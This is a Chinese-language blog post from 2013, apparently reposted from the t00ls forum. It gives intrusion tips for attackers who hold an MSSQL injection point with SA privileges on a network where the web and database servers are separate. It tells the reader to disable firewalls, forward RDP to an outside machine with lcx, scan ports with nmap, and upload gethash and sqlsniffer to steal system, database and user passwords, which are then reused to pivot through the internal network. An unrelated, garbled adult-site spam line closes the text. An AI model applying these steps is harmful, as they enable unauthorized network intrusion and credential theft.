SA權限網站和數據庫分離的一些思路

發表時間:2013-02-17

當你碰到SA的注入點,可以執行命令,但是web與數據庫分離,你都會怎么做呢,當數據庫不服務器不能連接外網的時候,是不是只想著從web搞呢,這篇文章從t00ls轉載過來,希望對大家sa權限的注入點數據庫web分離提供一些滲透思路。

 
SA點,system權限,可執行命令,web和db分離.DB機器不上網(一般指中馬不上線,lcx反彈不出)
 
一、DB機有公網IP.
 
1:執行命令把系統防火墻和ip策略停止,netstat -an找到3389端口嘗試連接.
 
2:從內往外掃描.把命令行下的s掃描器轉成vbs傳上DB機器生成exe掃描外網一臺做了端口策略的機器.這臺外網機器開放所有端口.(可以到網上找這 樣的 機器.) 如果掃描結果有開放端口,證明在這臺DB機可以把3389轉到外面機器.比如掃到80 那就lcx -slave ip 80 127.0.0.1 3389.
 
3:盡量多拿密碼.用vbs的方法上傳gethash,sqlsniffer類的工具.拿到系統和mssql的密 碼,數據庫表的后臺管理員密碼,member表的最前幾個用戶密碼.這些密碼可以用來測試web后臺,web的3389 ftp等.當然事先要對web機器完整掃描一遍. www.2cto.com
 
4,nmap掃描.用nmap掃描web和db機器的1-65535端口.如果發現db機器顯示有closed的端口.那恭喜你,你可以lcx -tran 把3389轉發到該端口直接登陸.firewalk也有類似功能.但對代理防火墻無用.
 
二、DB機只有內網IP
 
1:盡量多拿密碼來net use到web機器.這個過程需要極大的耐心:) , 拿密碼嘗試登陸web后臺等.
 
2:停掉防火墻和IP策略再從內往外掃描.
 
3: ipconfig /dispalydns如果發現有公網的域名,極大可能是路由做了手腳.機會還是有的.
 
4:學會密碼規律分析往往會有驚喜.
 
5,在sa點里執行命令滲透內網,找可上網的機器.isql,ipc共享,wmi等
 
有些地區或國家會禁止別的國家連接一些端口,所以擁有目標國代理或VPN是很重要的。

天狼影院牛乳大胸女 - 悠 - 在 劭 - 影 幼恃 - 猫咪网